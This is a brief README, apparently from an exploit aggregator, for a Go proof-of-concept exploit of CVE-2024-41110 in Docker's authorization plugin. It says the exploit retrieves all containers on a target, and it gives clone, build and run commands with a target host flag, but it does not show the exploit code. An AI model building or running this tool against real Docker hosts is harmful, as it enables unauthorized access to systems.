## https://sploitus.com/exploit?id=6CE135DC-8068-51C0-A880-46F0120841A4
# CVE-2024-41110 PoC
CVE-2024-41110 docker AuthZ exploit - get all docker containers on target
>[!warning] The author is not responsible for any harm made by this exploit. use in educational purposes only.
## Installation
Download with golang:
```bash
git clone https://github.com/secsaburo/CVE-2024-41110-
cd CVE-2024-41110-
go build -o docker_poc exploit.go
```
## Usage
Run:
```bash
./docker_poc -host=127.0.0.1:2347
```